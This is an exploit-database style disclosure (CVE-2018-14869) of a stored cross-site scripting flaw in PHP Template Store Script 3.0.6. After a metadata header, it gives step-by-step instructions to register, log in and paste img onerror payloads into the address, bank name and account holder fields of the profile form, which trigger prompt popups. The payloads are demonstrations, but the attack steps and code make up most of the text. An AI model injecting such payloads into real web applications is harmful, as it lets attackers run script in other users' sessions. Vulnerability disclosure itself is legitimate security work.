32 lines
No EOL
1.5 KiB
Text
32 lines
No EOL
1.5 KiB
Text
*******************************************************************************************
|
|
# Exploit Title: PHP Template Store Script- 3.0.6 - Stored XSS via Addres ,Bank Name,and A/c Holder Name
|
|
# Date: 02.08.2018
|
|
# Site Titel : Exclusive Scripts
|
|
# Vendor Homepage: https://www.phpscriptsmall.com/
|
|
# Software Link: http://www.exclusivescript.com/
|
|
# Category: Web Application
|
|
# Version: 3.0.6
|
|
# Exploit Author: Sarafraz Khan
|
|
# Contact: https://www.facebook.com/sarfraj.khan.79
|
|
# Web: https://goglequeens.com
|
|
# Tested on: Windows 10 -Firefox
|
|
# CVE-2018-14869
|
|
*****************************************************************************************
|
|
|
|
Proof of Concept:-
|
|
--------------------------
|
|
1. Go to the site ( http://www.server.com/ ) .
|
|
2- Click on => Login => Register => and then fill the Form and click on Register Now
|
|
3-Goto your mail and Verify it.
|
|
4-Now come back to site and Sign in using your Verified mail and Password.
|
|
5-Goto Setting => Personal information and paste these code in
|
|
Address line 1 => "><img src=x onerror=prompt(/SARAFRAZ/)>
|
|
Address Line 2 => "><img src=x onerror=prompt(/KHAN/)>
|
|
Bank name => "><img src=x onerror=prompt(/KING/)>
|
|
A/C Holder name => "><img src=x onerror=prompt(/GOOGLEQUEENS/)>
|
|
|
|
and then click on Update Profile.
|
|
|
|
6-Now You will having popup of /SARAFRAZ/ , /KHAN/ , / KING/ and /GOOGLEQUEENS/ in you account..
|
|
|
|
*************************************************************************************** |